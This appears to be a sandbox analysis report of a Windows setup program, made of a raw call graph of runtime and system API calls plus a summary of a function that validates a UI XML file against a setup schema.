73233->73219 73234->73229 73235->73228 73236->73225 73241 69d73c8f 73237->73241 73239 69d744a0 73239->72769 73240->72773 73242 69d73c9b __EH_prolog3 73241->73242 73243 69da833e ctype 110 API calls 73242->73243 73244 69d73cb7 73243->73244 73245 69dc8e54 ctype KiUserExceptionDispatcher 73244->73245 73246 69d73cca 73245->73246 73247 69d73a16 ctype 111 API calls 73246->73247 73248 69d73cdd 73247->73248 73249 69d73ded 73248->73249 73250 69da89f0 ctype 67 API calls 73248->73250 73251 69dc8f0e ctype RtlFreeHeap 73249->73251 73252 69d73cfe 73250->73252 73253 69d73e36 ctype 73251->73253 73254 69da84b9 ctype 101 API calls 73252->73254 73253->73239 73255 69d73d07 73254->73255 73256 69dc8f0e ctype RtlFreeHeap 73255->73256 73257 69d73d16 73256->73257 73284 69da8989 73257->73284 73261 69d73d29 ctype 73262 69dc8f0e ctype RtlFreeHeap 73261->73262 73263 69d73d48 73262->73263 73264 69d73d50 73263->73264 73267 69d73def _wcspbrk 73263->73267 73265 69da89f0 ctype 67 API calls 73264->73265 73266 69d73d5e 73265->73266 73268 69da84b9 ctype 101 API calls 73266->73268 73267->73249 73270 69da8aed ctype 67 API calls 73267->73270 73269 69d73d67 73268->73269 73271 69dc8f0e ctype RtlFreeHeap 73269->73271 73272 69d73e17 73270->73272 73276 69d73d76 ctype 73271->73276 73273 69da84b9 ctype 101 API calls 73272->73273 73274 69d73e20 73273->73274 73275 69dc8f0e ctype RtlFreeHeap 73274->73275 73275->73249 73276->73249 73277 69da8aed ctype 67 API calls 73276->73277 73278 69d73dc5 73277->73278 73279 69da84b9 ctype 101 API calls 73278->73279 73280 69d73dce 73279->73280 73281 69dc8f0e ctype RtlFreeHeap 73280->73281 73282 69d73ddd 73281->73282 73302 69da8636 101 API calls 2 library calls 73282->73302 73303 69da8931 73284->73303 73286 69da8992 73288 69da89a9 73286->73288 73311 69dcc49f 73286->73311 73289 69d73d1d 73288->73289 73290 69dc8d91 ctype 70 API calls 73288->73290 73295 69da8aed 73289->73295 73291 69da89bc 73290->73291 73314 69dc7942 67 API calls 2 library calls 73291->73314 73293 69da89d9 73294 69dc8dcd ctype 101 API calls 73293->73294 73294->73289 73296 69da8b02 73295->73296 73297 69da8b0b 73296->73297 73298 69da8b1a ctype 73296->73298 73299 69dc8eab std::bad_exception::bad_exception 67 API calls 73297->73299 73320 69dafeb7 67 API calls 3 library calls 73298->73320 73300 69da8b13 73299->73300 73300->73261 73302->73249 73304 69da897e 73303->73304 73306 69da8944 73303->73306 73304->73286 73305 69dcc49f ctype GetStringTypeW 73305->73306 73306->73305 73307 69da8967 73306->73307 73307->73304 73308 69dc8d91 ctype 70 API calls 73307->73308 73309 69da8975 73308->73309 73310 69dc8dcd ctype 101 API calls 73309->73310 73310->73304 73315 69dd094f 73311->73315 73313 69dcc4ae 73313->73286 73314->73293 73316 69dd0964 73315->73316 73317 69dd0960 73315->73317 73318 69dd097f GetStringTypeW 73316->73318 73319 69dd096f 73316->73319 73317->73313 73318->73319 73319->73313 73320->73300 73322 69dc8d91 ctype 70 API calls 73321->73322 73323 69da88e2 73322->73323 73351 69dccb99 73323->73351 73326 69dc8dcd ctype 101 API calls 73327 69d73a42 73326->73327 73327->72788 73329 69da8ce1 __EH_prolog3 ctype 73328->73329 73330 69dc8e54 ctype KiUserExceptionDispatcher 73329->73330 73331 69da8cfa ctype 73330->73331 73413 69daffa8 73331->73413 73333 69da8d21 ctype 73333->72793 73335 69da8c86 __EH_prolog3 ctype 73334->73335 73336 69dc8e54 ctype KiUserExceptionDispatcher 73335->73336 73337 69da8c9f ctype 73336->73337 73338 69daffa8 ctype 101 API calls 73337->73338 73339 69da8cc2 ctype 73338->73339 73339->72795 73341 69da8aab 73340->73341 73342 69da8ac8 ctype 73341->73342 73343 69da8ab6 73341->73343 73422 69dafeb7 67 API calls 3 library calls 73342->73422 73344 69dc8eab std::bad_exception::bad_exception 67 API calls 73343->73344 73346 69d73b8c 73344->73346 73347 69da85bc 73346->73347 73348 69da85c5 73347->73348 73350 69d73ba1 73347->73350 73349 69dc8e8c ctype KiUserExceptionDispatcher 73348->73349 73349->73350 73350->72819 73350->72820 73354 69dccb61 73351->73354 73359 69dcc12f 73354->73359 73360 69dcc142 73359->73360 73364 69dcc18f 73359->73364 73400 69dcd3d1 66 API calls 2 library calls 73360->73400 73362 69dcc147 73363 69dcc16f 73362->73363 73401 69dd1edb 74 API calls 6 library calls 73362->73401 73363->73364 73402 69dd172d 68 API calls 6 library calls 73363->73402 73367 69dcc9ec 73364->73367 73368 69dcca1c _wcsnlen 73367->73368 73369 69dcca08 73367->73369 73368->73369 73372 69dcca33 73368->73372 73403 69dcbd29 66 API calls __getptd_noexit 73369->73403 73371 69dcca0d 73404 69dcecf4 11 API calls __close 73371->73404 73379 69dcca17 73372->73379 73405 69dd2016 LCMapStringW _wcsnlen 73372->73405 73375 69dcca79 73376 69dcca9c 73375->73376 73377 69dcca85 73375->73377 73381 69dccaa1 73376->73381 73388 69dccab2 73376->73388 73406 69dcbd29 66 API calls __getptd_noexit 73377->73406 73378 69dcb091 __call_reportfault 5 API calls 73382 69da88ec 73378->73382 73379->73378 73408 69dcbd29 66 API calls __getptd_noexit 73381->73408 73382->73326 73383 69dcca8a 73407 69dcbd29 66 API calls __getptd_noexit 73383->73407 73385 69dccafd 73409 69dcbd29 66 API calls __getptd_noexit 73385->73409 73386 69dccb0a 73410 69dd2016 LCMapStringW _wcsnlen 73386->73410 73392 69dccacd __crtGetStringTypeA_stat 73388->73392 73393 69dcbfb3 _malloc 66 API calls 73388->73393 73391 69dccb1d 73394 69dccb24 73391->73394 73395 69dccb35 73391->73395 73392->73385 73392->73386 73393->73392 73396 69dcb927 _wcslwr_s_l_stat 66 API calls 73394->73396 73411 69dcbd29 66 API calls __getptd_noexit 73395->73411 73398 69dccb2e 73396->73398 73412 69dcc244 66 API calls _free 73398->73412 73400->73362 73401->73363 73402->73364 73403->73371 73404->73379 73405->73375 73406->73383 73407->73379 73408->73371 73409->73383 73410->73391 73411->73398 73412->73379 73414 69dc8d91 ctype 70 API calls 73413->73414 73415 69daffc2 73414->73415 73416 69dcb1f3 _memcpy_s 66 API calls 73415->73416 73417 69daffd3 73416->73417 73418 69dcb1f3 _memcpy_s 66 API calls 73417->73418 73419 69daffe3 73418->73419 73420 69dc8dcd ctype 101 API calls 73419->73420 73421 69dafff1 73420->73421 73421->73333 73422->73346 73427 69db6583 73423->73427 73428 69d741bd 73423->73428 73424 69db65a0 73426 69dcbe0e _free 66 API calls 73424->73426 73425 69dc8f0e ctype RtlFreeHeap 73425->73427 73426->73428 73427->73424 73427->73425 81762 69a73fbf 81765 69a73ee2 81762->81765 81770 69a73e29 81765->81770 81768 69a73e29 5 API calls 81769 69a73f14 81768->81769 81772 69a7f65c 81770->81772 81773 69a73e4d 81770->81773 81771 69a7f6e6 81772->81771 81783 69a85f11 EtwTraceMessage 81772->81783 81773->81772 81775 69a73e73 RegOpenKeyExW 81773->81775 81776 69a73ec6 81775->81776 81777 69a73ea0 RegQueryValueExW 81775->81777 81778 69a73ed4 81776->81778 81779 69a73ecb RegCloseKey 81776->81779 81777->81776 81780 69a73ebc 81777->81780 81778->81768 81778->81769 81779->81778 81780->81776 81782 69a877b8 EtwTraceMessage 81780->81782 81782->81776 81783->81771 81784 69d8efb2 81785 69d8efbe __EH_prolog3 81784->81785 81790 69d8a655 81785->81790 81787 69d8efc8 81814 69dab477 74 API calls 2 library calls 81787->81814 81789 69d8f03b ctype 81791 69d8a661 __EH_prolog3 81790->81791 81815 69d8670b 81791->81815 81793 69d8a695 81823 69d86bbd 81793->81823 81795 69d8a6a5 81796 69d81b4a 67 API calls 81795->81796 81797 69d8a6b4 81796->81797 81798 69d81b4a 67 API calls 81797->81798 81799 69d8a6cd 81798->81799 81829 69d83b22 81799->81829 81801 69d8a6fe 81836 69d86dc1 81801->81836 81805 69d8a758 81806 69dc8eab std::bad_exception::bad_exception 67 API calls 81805->81806 81807 69d8a7ca 81806->81807 81808 69dc8eab std::bad_exception::bad_exception 67 API calls 81807->81808 81809 69d8a7e3 81808->81809 81810 69dc8eab std::bad_exception::bad_exception 67 API calls 81809->81810 81811 69d8a7fc 81810->81811 81812 69dc8eab std::bad_exception::bad_exception 67 API calls 81811->81812 81813 69d8a815 ctype 81812->81813 81813->81787 81814->81789 81816 69d86717 __EH_prolog3 81815->81816 81817 69dc8eab std::bad_exception::bad_exception 67 API calls 81816->81817 81818 69d8672b 81817->81818 81819 69dc8eab std::bad_exception::bad_exception 67 API calls 81818->81819 81820 69d86740 81819->81820 81821 69dc8eab std::bad_exception::bad_exception 67 API calls 81820->81821 81822 69d86761 ctype 81821->81822 81822->81793 81824 69d86bc9 __EH_prolog3 81823->81824 81825 69dc8eab std::bad_exception::bad_exception 67 API calls 81824->81825 81826 69d86bdd 81825->81826 81827 69dc8eab std::bad_exception::bad_exception 67 API calls 81826->81827 81828 69d86bf2 ctype 81827->81828 81828->81795 81830 69d83b2e __EH_prolog3 81829->81830 81831 69d83b9e 81830->81831 81835 69d83b5a ctype 81830->81835 81846 69dbcc2c 81830->81846 81854 69dc78c8 RaiseException 81831->81854 81833 69d83ba3 81835->81801 81837 69dc8eab std::bad_exception::bad_exception 67 API calls 81836->81837 81838 69d86dd2 81837->81838 81839 69d89746 81838->81839 81844 69d89752 __EH_prolog3 81839->81844 81840 69d8977e ctype 81840->81805 81841 69d897c3 81855 69dc78c8 RaiseException 81841->81855 81843 69d897c8 81844->81840 81844->81841 81845 69dbcc2c ctype 71 API calls 81844->81845 81845->81844 81847 69dbcc38 __EH_prolog3 81846->81847 81848 69dcbe92 __recalloc 70 API calls 81847->81848 81849 69dbcc46 81848->81849 81850 69dcbe92 __recalloc 70 API calls 81849->81850 81853 69dbcc4d ctype 81849->81853 81851 69dbcc62 81850->81851 81852 69dc8eab std::bad_exception::bad_exception 67 API calls 81851->81852 81851->81853 81852->81853 81853->81830 81854->81833 81855->81843 81856 698e1003 81881 698df179 81856->81881 81859 698ee8e8 ctype 107 API calls 81860 698e106a ctype 81859->81860 81884 698f7acf 81860->81884 81864 698e109d 81865 698ee8e8 ctype 107 API calls 81864->81865 81869 698e10e6 ctype 81865->81869 81866 698e1122 PathFileExistsW 81867 698e112c 81866->81867 81866->81869 81900 698f7bec 81867->81900 81869->81866 81870 698ee8e8 ctype 107 API calls 81869->81870 81870->81866 81871 698e115c ShellExecuteW 81910 698f8460 81871->81910 81872 698e1139 ctype 81872->81871 81874 698f81de ctype 67 API calls 81872->81874 81876 698e1158 81874->81876 81875 698e117c 81912 698f7c57 CloseHandle DeleteFileW CloseHandle 81875->81912 81876->81871 81878 698e1185 ctype 81879 698f87c1 ___crtMessageBoxW 5 API calls 81878->81879 81880 698e11b1 81879->81880 81913 698f5584 81881->81913 81883 698df18b 81883->81859 81885 698f7aef GetTempPathW 81884->81885 81886 698f7b1e 81884->81886 81888 698f7b06 81885->81888 81891 698f7b10 81885->81891 81887 698f9064 __NMSG_WRITE 66 API calls 81886->81887 81887->81891 82042 698f7f08 GetLastError 81888->82042 81889 698f7b3f GetTempFileNameW 81889->81888 81893 698f7b5e 81889->81893 81890 698f7b0b 81895 698f87c1 ___crtMessageBoxW 5 API calls 81890->81895 81891->81889 81891->81890 82033 698f9064 81893->82033 81896 698e1093 81895->81896 81899 698e0eca SendMessageW 81896->81899 81897 698f7b7e 81898 698f7f22 5 API calls 81897->81898 81898->81890 81899->81864 81901 698f7bfa FindCloseChangeNotification 81900->81901 81902 698f7c04 81900->81902 81901->81902 81903 698f7c1b DeleteFileW 81902->81903 81904 698f7c0a DeleteFileW 81902->81904 81905 698f7c3a MoveFileW 81903->81905 81906 698f7c28 GetLastError 81903->81906 81908 698f7c14 81904->81908 81907 698f7c4b 81905->81907 81905->81908 81906->81905 81906->81908 82046 698f7f08 GetLastError 81907->82046 81908->81872 81911 698f846f 81910->81911 81911->81875 81912->81878 81969 6990265b 81913->81969 81915 698f5590 GetCurrentProcessId 81970 698df197 81915->81970 81918 698f83fd std::bad_exception::bad_exception 66 API calls 81919 698f55be ctype 81918->81919 81973 698defe2 CreateToolhelp32Snapshot 81919->81973 81922 698df197 110 API calls 81923 698f5609 81922->81923 81924 698f83fd std::bad_exception::bad_exception 66 API calls 81923->81924 81925 698f5617 ctype 81924->81925 81926 698eeb56 78 API calls 81925->81926 81927 698f5636 81926->81927 81929 698defe2 9 API calls 81927->81929 81944 698f566c ctype 81927->81944 81928 698f56a7 81946 698f57fb ctype 81928->81946 81983 698df07e 81928->81983 81931 698f5642 81929->81931 81930 698f83fd std::bad_exception::bad_exception 66 API calls 81933 698f569d 81930->81933 81935 698df07e 107 API calls 81931->81935 81936 698df0c8 100 API calls 81933->81936 81937 698f564c 81935->81937 81936->81928 81940 698f83fd std::bad_exception::bad_exception 66 API calls 81937->81940 81938 698f83fd std::bad_exception::bad_exception 66 API calls 81939 698f56c9 81938->81939 81942 698eea8d 98 API calls 81939->81942 81941 698f565a 81940->81941 81943 698eea8d 98 API calls 81941->81943 81945 698f56db ctype 81942->81945 81943->81944 81944->81928 81944->81930 81947 698f5716 81945->81947 81948 698f83fd std::bad_exception::bad_exception 66 API calls 81945->81948 81946->81883 81947->81946 81949 698df07e 107 API calls 81947->81949 81950 698f570c 81948->81950 81951 698f572a 81949->81951 81986 698df0c8 81950->81986 81953 698f83fd std::bad_exception::bad_exception 66 API calls 81951->81953 81954 698f5738 81953->81954 81955 698eea8d 98 API calls 81954->81955 81956 698f574a ctype 81955->81956 81957 698f5785 81956->81957 81958 698f83fd std::bad_exception::bad_exception 66 API calls 81956->81958 81957->81946 81959 698f57ab GetTempPathW 81957->81959 81961 698f827a ctype 67 API calls 81957->81961 81960 698f577b 81958->81960 81962 698f57be 81959->81962 81963 698df0c8 100 API calls 81960->81963 81961->81959 81962->81946 81964 698f83fd std::bad_exception::bad_exception 66 API calls 81962->81964 81963->81957 81965 698f57d8 81964->81965 81966 698df0c8 100 API calls 81965->81966 81967 698f57e2 81966->81967 81967->81946 81968 698f827a ctype 67 API calls 81967->81968 81968->81946 81969->81915 81998 698f5848 81970->81998 81972 698df1ca 81972->81918 81974 698df00b _memset 81973->81974 81975 698df067 81973->81975 81978 698df01d Process32FirstW 81974->81978 81976 698f87c1 ___crtMessageBoxW 5 API calls 81975->81976 81977 698df075 81976->81977 81977->81922 81979 698df03a 81978->81979 81980 698df058 FindCloseChangeNotification 81979->81980 81981 698df045 Process32NextW 81979->81981 81980->81975 81981->81979 82024 698f54b3 81983->82024 81985 698df0ab 81985->81938 81987 698df0d4 __EH_prolog3 81986->81987 81988 698f83fd std::bad_exception::bad_exception 66 API calls 81987->81988 81989 698df0e3 ctype 81988->81989 81990 698f811c ctype 98 API calls 81989->81990 81991 698df106 81990->81991 81992 698df123 81991->81992 81994 698f827a ctype 67 API calls 81991->81994 82032 698df0b7 GetTempFileNameW 81992->82032 81994->81992 82001 698f5854 __EH_prolog3 81998->82001 81999 698f599f 82000 698ef0e8 98 API calls 81999->82000 82002 698f59b6 82000->82002 82001->81999 82003 698f58ae GetTokenInformation 82001->82003 82019 698ef092 82002->82019 82005 698f5999 FindCloseChangeNotification 82003->82005 82006 698f58c7 _strnlen 82003->82006 82005->81999 82006->82005 82012 698f5912 GetTokenInformation 82006->82012 82016 698f82d1 67 API calls ctype 82006->82016 82017 698f5987 ctype 82006->82017 82023 698f79b9 66 API calls 82006->82023 82007 698f59c9 ctype 82008 698f59fd 82007->82008 82009 698f59e3 82007->82009 82011 698ee8e8 ctype 107 API calls 82008->82011 82010 698f83fd std::bad_exception::bad_exception 66 API calls 82009->82010 82013 698f59eb 82010->82013 82011->82013 82012->82006 82015 698f83fd std::bad_exception::bad_exception 66 API calls 82013->82015 82018 698f5a23 ctype 82015->82018 82016->82006 82017->82005 82018->81972 82020 698ef09e __EH_prolog3 82019->82020 82021 698f38c5 98 API calls 82020->82021 82022 698ef0d6 ctype 82021->82022 82022->82007 82023->82006 82025 698f54bf __EH_prolog3 82024->82025 82027 698f827a ctype 67 API calls 82025->82027 82029 698f5519 ctype 82025->82029 82031 698f5553 82025->82031 82026 698ee8e8 ctype 107 API calls 82028 698f556c ctype 82026->82028 82027->82029 82028->81985 82030 698f811c ctype 98 API calls 82029->82030 82029->82031 82030->82031 82031->82026 82036 698f9076 82033->82036 82034 698f907a 82037 698f907f 82034->82037 82043 698fb570 66 API calls __getptd_noexit 82034->82043 82036->82034 82036->82037 82039 698f90bd 82036->82039 82037->81897 82039->82037 82045 698fb570 66 API calls __getptd_noexit 82039->82045 82041 698f9096 82044 698fb514 11 API calls _raise 82041->82044 82042->81890 82043->82041 82044->82037 82045->82041 82046->81908 82047 9a2a24 82094 9a3db0 82047->82094 82049 9a2a30 GetStartupInfoW 82050 9a2a44 HeapSetInformation 82049->82050 82052 9a2a4f 82049->82052 82050->82052 82095 9a3d83 HeapCreate 82052->82095 82053 9a2a9d 82054 9a2aa8 82053->82054 82119 9a29f6 66 API calls 3 library calls 82053->82119 82120 9a3c03 86 API calls 4 library calls 82054->82120 82057 9a2aae 82058 9a2aba __RTC_Initialize 82057->82058 82059 9a2ab2 82057->82059 82096 9a3642 73 API calls __calloc_crt 82058->82096 82121 9a29f6 66 API calls 3 library calls 82059->82121 82061 9a2ab9 82061->82058 82063 9a2ac7 82064 9a2acb 82063->82064 82065 9a2ad3 GetCommandLineW 82063->82065 82122 9a2f1c 66 API calls 3 library calls 82064->82122 82097 9a35e5 GetEnvironmentStringsW 82065->82097 82068 9a2ae3 82123 9a3532 67 API calls 2 library calls 82068->82123 82071 9a2aed 82072 9a2af9 82071->82072 82073 9a2af1 82071->82073 82103 9a32f6 82072->82103 82124 9a2f1c 66 API calls 3 library calls 82073->82124 82077 9a2afe 82078 9a2b0a 82077->82078 82079 9a2b02 82077->82079 82117 9a2cdd 77 API calls 4 library calls 82078->82117 82125 9a2f1c 66 API calls 3 library calls 82079->82125 82083 9a2b11 82084 9a2b16 82083->82084 82087 9a2b1d __wwincmdln 82083->82087 82126 9a2f1c 66 API calls 3 library calls 82084->82126 82086 9a2b1c 82086->82087 82087->82086 82118 9a2915 HeapSetInformation Run 82087->82118 82089 9a2b3e 82090 9a2b4c 82089->82090 82127 9a2ebe 66 API calls _doexit 82089->82127 82128 9a2ef4 66 API calls _doexit 82090->82128 82093 9a2b51 _doexit 82094->82049 82095->82053 82096->82063 82098 9a35f6 82097->82098 82099 9a35fa 82097->82099 82098->82068 82099->82099 82129 9a4f38 82099->82129 82101 9a361c _memmove 82102 9a3623 FreeEnvironmentStringsW 82101->82102 82102->82068 82104 9a330e _wcslen 82103->82104 82108 9a3306 82103->82108 82160 9a4f82 82104->82160 82106 9a3388 82167 9a4ef9 66 API calls 2 library calls 82106->82167 82108->82077 82109 9a4f82 __calloc_crt 66 API calls 82111 9a3332 _wcslen 82109->82111 82110 9a33ae 82168 9a4ef9 66 API calls 2 library calls 82110->82168 82111->82106 82111->82108 82111->82109 82111->82110 82114 9a33c5 82111->82114 82166 9a4e4d 66 API calls 2 library calls 82111->82166 82169 9a46ec 10 API calls __call_reportfault 82114->82169 82116 9a33d1 82116->82077 82117->82083 82118->82089 82119->82054 82120->82057 82121->82061 82123->82071 82127->82090 82128->82093 82130 9a4f41 82129->82130 82132 9a4f77 82130->82132 82133 9a4f58 Sleep 82130->82133 82135 9a6115 82130->82135 82132->82101 82134 9a4f6d 82133->82134 82134->82130 82134->82132 82136 9a6192 82135->82136 82143 9a6123 82135->82143 82158 9a4771 _DecodePointerInternal 82136->82158 82138 9a6198 82159 9a47e5 66 API calls __getptd_noexit 82138->82159 82141 9a6151 RtlAllocateHeap 82141->82143 82151 9a618a 82141->82151 82143->82141 82144 9a612e 82143->82144 82145 9a617e 82143->82145 82149 9a617c 82143->82149 82155 9a4771 _DecodePointerInternal 82143->82155 82144->82143 82152 9a311e 66 API calls __NMSG_WRITE 82144->82152 82153 9a2f6a 66 API calls 6 library calls 82144->82153 82154 9a2c43 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 82144->82154 82156 9a47e5 66 API calls __getptd_noexit 82145->82156 82157 9a47e5 66 API calls __getptd_noexit 82149->82157 82151->82130 82152->82144 82153->82144 82155->82143 82156->82149 82157->82151 82158->82138 82159->82151 82163 9a4f8b 82160->82163 82162 9a4fc8 82162->82111 82163->82162 82164 9a4fa9 Sleep 82163->82164 82170 9a61ae 82163->82170 82165 9a4fbe 82164->82165 82165->82162 82165->82163 82166->82111 82167->82108 82168->82108 82169->82116 82171 9a61ba 82170->82171 82176 9a61d5 82170->82176 82172 9a61c6 82171->82172 82171->82176 82179 9a47e5 66 API calls __getptd_noexit 82172->82179 82174 9a61e8 RtlAllocateHeap 82175 9a620f 82174->82175 82174->82176 82175->82163 82176->82174 82176->82175 82180 9a4771 _DecodePointerInternal 82176->82180 82177 9a61cb 82177->82163 82179->82177 82180->82176 82181 698e30b1 82188 698f6041 82181->82188 82183 698ee8e8 ctype 107 API calls 82185 698e30fd ctype 82183->82185 82184 698e30c2 82184->82183 82186 698e312b RaiseException 82185->82186 82187 698e311f 82185->82187 82197 6990265b 82188->82197 82190 698f604d GetCommandLineW 82191 698dbe03 111 API calls 82190->82191 82192 698f605e 82191->82192 82198 698dc1d8 109 API calls 82192->82198 82194 698f606e ctype 82195 698dc137 ctype 66 API calls 82194->82195 82196 698f608a ctype 82195->82196 82196->82184 82197->82190 82198->82194

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 698F697A Relevance: 47.7, APIs: 16, Strings: 11, Instructions: 457comCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 594 698f697a-698f69b6 call 6990265b call 698e1e75 CoCreateInstance 599 698f69b8-698f6a10 call 698dc98c call 698db93e call 698f8460 call 698db93e 594->599 600 698f6a36-698f6a87 call 698ee8e8 call 698f50fb PathIsRelativeW 594->600 614 698f6a18-698f6a33 call 698f8460 * 2 call 69902709 599->614 615 698f6a12-698f6a14 599->615 620 698f6a89-698f6a92 PathFileExistsW 600->620 621 698f6a94-698f6ac5 call 698f83fd call 698ef21d PathFileExistsW * 2 600->621 615->614 624 698f6ade-698f6b23 call 698f7cdc call 698db93e 620->624 634 698f6ac7-698f6acd call 698eea8d 621->634 635 698f6ad2-698f6ad9 call 698f8460 621->635 640 698f6b29-698f6b2e 624->640 641 698f6df0-698f6ed5 call 698ee8e8 * 2 call 698f80ba call 698f8460 * 2 call 698ee8e8 624->641 634->635 635->624 640->641 642 698f6b34-698f6b56 CoCreateInstance 640->642 643 698f6b58-698f6bb1 call 698dc98c call 698db93e call 698f8460 call 698db93e 642->643 644 698f6bd3-698f6bf0 call 698ee8e8 PathIsRelativeW 642->644 674 698f6bb9-698f6bce VariantClear call 698f8460 643->674 675 698f6bb3-698f6bb5 643->675 651 698f6bfd-698f6c2e call 698f83fd call 698ef21d PathFileExistsW * 2 644->651 652 698f6bf2-698f6bfb PathFileExistsW 644->652 670 698f6c3b-698f6c42 call 698f8460 651->670 671 698f6c30-698f6c36 call 698eea8d 651->671 655 698f6c47-698f6c96 call 698db93e call 698f7cdc VariantClear 652->655 680 698f6c98-698f6cab call 698fdbdb 655->680 681 698f6cb0-698f6cbf 655->681 670->655 671->670 674->644 675->674 680->681 685 698f6cc7-698f6cff VariantClear 681->685 686 698f6cc1-698f6cc3 681->686 692 698f6d06-698f6d19 685->692 686->685 697 698f6d1f-698f6db0 call 698ee8e8 call 698f80ba call 698f8460 call 698ee8e8 call 698dca39 692->697 698 698f6db8-698f6dc1 692->698 697->698 701 698f6dc9-698f6ddd call 698f8460 698->701 702 698f6dc3-698f6dc5 698->702 709 698f6ddf-698f6de1 701->709 710 698f6de5-698f6de9 VariantClear 701->710 702->701 709->710 710->641
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F6981
                                                                                                                                                                      • Part of subcall function 698E1E75: __EH_prolog3.LIBCMT ref: 698E1E7C
                                                                                                                                                                      • Part of subcall function 698E1E75: GetThreadLocale.KERNEL32(?,00000004,698E6734,0000004C,0000004C,698E7142,?,00000000), ref: 698E1E8E
                                                                                                                                                                    • CoCreateInstance.OLE32(698D7980,00000000,00000017,698D7970,?,?,00000068,698F65A6,?,?,?,?,698F2A30,?,00000000,?), ref: 698F69AC
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,?,?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 698F6A7F
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271), ref: 698F6A8C
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698F6ABE
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271), ref: 698F6AC1
                                                                                                                                                                    • CoCreateInstance.OLE32(698D7990,00000000,00000017,698D79A0,?), ref: 698F6B4C
                                                                                                                                                                      • Part of subcall function 698DC98C: GetThreadLocale.KERNEL32 ref: 698DC999
                                                                                                                                                                      • Part of subcall function 698DB93E: __EH_prolog3.LIBCMT ref: 698DB945
                                                                                                                                                                      • Part of subcall function 698EF21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,698DC3AE), ref: 698EF241
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 698F6BBD
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,?), ref: 698F6BE8
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 698F6BF5
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?), ref: 698F6C27
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 698F6C2A
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 698F6C8E
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698F6CAB
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 698F6CED
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 698F6DE9
                                                                                                                                                                      • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
                                                                                                                                                                    Strings
                                                                                                                                                                    • UIInfo.xml, xrefs: 698F6D8C, 698F6EC3
                                                                                                                                                                    • UiInfo.xml, xrefs: 698F6A65
                                                                                                                                                                    • CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s), xrefs: 698F6B7C
                                                                                                                                                                    • Validation FAILED Reason:%s, xrefs: 698F6D5F
                                                                                                                                                                    • SetupUi.xsd, xrefs: 698F6BD7
                                                                                                                                                                    • Loading file - %s, xrefs: 698F6AF3
                                                                                                                                                                    • http://schemas.microsoft.com/SetupUI/2008/01/imui, xrefs: 698F6C7A
                                                                                                                                                                    • CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s), xrefs: 698F69DC
                                                                                                                                                                    • Stopping XML schema validation of UI information and continuing, xrefs: 698F69FA, 698F6B9A
                                                                                                                                                                    • Add to schema collection schema file - %s, xrefs: 698F6C4D
                                                                                                                                                                    • Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s, xrefs: 698F6E8B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Path$ExistsFile$H_prolog3$ClearVariant$CreateInstanceLocaleRelativeThread$AppendException@8Throw
                                                                                                                                                                    • String ID: Validation FAILED Reason:%s$Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s$Add to schema collection schema file - %s$CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s)$CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s)$Loading file - %s$SetupUi.xsd$Stopping XML schema validation of UI information and continuing$UIInfo.xml$UiInfo.xml$http://schemas.microsoft.com/SetupUI/2008/01/imui
                                                                                                                                                                    • API String ID: 3881019808-2332759018
                                                                                                                                                                    • Opcode ID: cd0201b506f816363c2971ce0f87e8fa6da3764eda5cada5616e73c325daedf8
                                                                                                                                                                    • Instruction ID: 2aa63c54473d4a06ea128881b0374dcaf8e8d3ba291efd3989e737204a525444
                                                                                                                                                                    • Opcode Fuzzy Hash: cd0201b506f816363c2971ce0f87e8fa6da3764eda5cada5616e73c325daedf8
